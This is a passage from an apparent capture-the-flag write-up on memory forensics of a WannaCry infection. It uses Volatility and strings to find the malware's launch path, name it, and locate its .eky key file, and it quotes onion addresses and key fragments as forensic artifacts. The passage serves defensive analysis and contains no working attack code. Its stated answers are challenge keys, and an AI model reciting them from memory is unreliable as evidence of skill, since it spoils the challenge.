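    """Header, separator and banner lines do not match ROW_RE and are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            procs.append(Proc(m["offset"], m["name"], int(m["pid"]),
                              int(m["ppid"]), m["created"], m["exited"]))
    return procs


def children_of(procs: List[Proc], pid: int) -> List[Proc]:
    return [p for p in procs if p.ppid == pid]


def by_pid(procs: List[Proc], pid: int) -> Optional[Proc]:
    return next((p for p in procs if p.pid == pid), None)


def parent_of(procs: List[Proc], pid: int) -> Optional[Proc]:
    """Parent by PPID. Windows reuses PIDs, so if duplicate_pids() reports
    the PPID, compare creation times before trusting the link."""
    me = by_pid(procs, pid)
    return by_pid(procs, me.ppid) if me else None


def duplicate_pids(procs: List[Proc]) -> Dict[int, List[Proc]]:
    """PIDs carved more than once by psscan (the two System rows above)."""
    groups = defaultdict(list)
    for p in procs:
        groups[p.pid].append(p)
    return {pid: ps for pid, ps in groups.items() if len(ps) > 1}


def lineage(procs: List[Proc], pid: int) -> List[str]:
    """Names from the process up to the first ancestor not in the table,
    e.g. @WanaDecryptor -> or4qtckT.exe -> explorer.exe (question 3)."""
    chain, seen = [], set()
    cur = by_pid(procs, pid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.name)
        cur = by_pid(procs, cur.ppid)
    return chain


def tree(procs: List[Proc], root_pid: int, indent: int = 0) -> List[str]:
    """Indented tree of descendants, oldest first, exited ones marked."""
    lines = []
    for p in sorted(children_of(procs, root_pid), key=lambda p: p.created):
        mark = " (exited)" if p.exited else ""
        lines.append(f"{'  ' * indent}{p.name} [{p.pid}]{mark}")
        lines.extend(tree(procs, p.pid, indent + 1))
    return lines


if __name__ == "__main__":
    procs = parse_psscan(PSSCAN_OUTPUT)
    print(" -> ".join(lineage(procs, 3968)))
    print("\n".join(tree(procs, 2732)))
    for pid, rows in duplicate_pids(procs).items():
        print(f"PID {pid} appears {len(rows)} times")
```

Piping the real output works the same way: vol.py -f infected.vmem --profile=Win7SP1x86 psscan > psscan.txt, then read the file into parse_psscan() instead of PSSCAN_OUTPUT.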

5. Find the path where the malicious file was first executed

Format: drive:\path\to\filename.extension

$ vol.py -f infected.vmem --profile=Win7SP1x86 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid:      4
************************************************************************
smss.exe pid:    268
Command line : \SystemRoot\System32\smss.exe
************************************************************************
(snip)
or4qtckT.exe pid:   2732
Command line : "C:\Users\hacker\Desktop\or4qtckT.exe" 
************************************************************************
(snip)
# or
$ vol.py -f infected.vmem --profile=Win7SP1x86 filescan | grep or4qtckT.exe

Volatility Foundation Volatility Framework 2.6.1
0x000000001ed75ae8      7      0 R--r-- \Device\HarddiskVolume1\Users\hacker\Desktop\or4qtckT.exe
0x000000001fcaf798      3      0 R--r-d \Device\HarddiskVolume1\Users\hacker\Desktop\or4qtckT.exe

Answer: C:\Users\hacker\Desktop\or4qtckT.exe

6. Can you identify what ransomware it is? (Do your research!)

Ransomware Name
@WanaDecryptor? Hum....

Answer: wannacry

7. What is the filename for the file with the ransomware public key that was used to encrypt the private key? (.eky extension)

$ strings infected.vmem | grep "*.eky"
00000000.eky
%08X.eky
00000000.eky
ntor-onion-key U4/KcG1psOjpLuE8cd8qI6zQ/52YTJaLX9WbxekySk0=
s+3Uc4gjE2RJhXkvwi6t1sUJmogfMlxLDDiXSpXekyHwVurAv/3yB6EPaRoujh1t
MIGJAoGBAPWZYCeKAn1MnwQjFNDim2Ie2eU6hDfDsaeky54mh8bJGIh1DgF2NJUL
3vmi1rxFkeazE6PEt6zZOYi/X2hcEpKmgTr+iLG/qPu7v/x6pp0OHR8cxUc1ekyW
%08X.eky
%08X.eky
$ strings infected.vmem | grep -n5 "00000000.eky"
183656-$02930FFEB87968D518101EB79202F1C3766078DA
183657-$109242967F596F4E3BF3D6996109EFF340FECB27
183658-Wur6
183659-  or4qtckT.exe
183660-00000000.res
183661:00000000.eky
183662-00000000.res
183663-00000000.res
183664-00000000.res
183665-00000000.pky
183666-00000000.res
--
1488780-13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
1488781-gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;
1488782-https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
1488783-00000000.res
1488784-00000000.pky
1488785:00000000.eky
1488786-( ) 
1488787-'k,k,^K^K
1488788-( ) 
1488789-'k,k,^K^K
1488790-( ) 
# 00000000.eky appears to be related to or4qtckT.exe.
$ vol.py -f infected.vmem --profile=Win7SP1x86 dumpfiles -D output/ -p 2732
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x83ea6268   2732   \Device\HarddiskVolume1\Users\hacker\Desktop\00000000.eky
SharedCacheMap 0x83ea6268   2732   \Device\HarddiskVolume1\Users\hacker\Desktop\00000000.eky
ImageSectionObject 0x991ffeb8   2732   
(snip)
# 00000000.eky is used by or4qtckT.exe.

Answer: 00000000.eky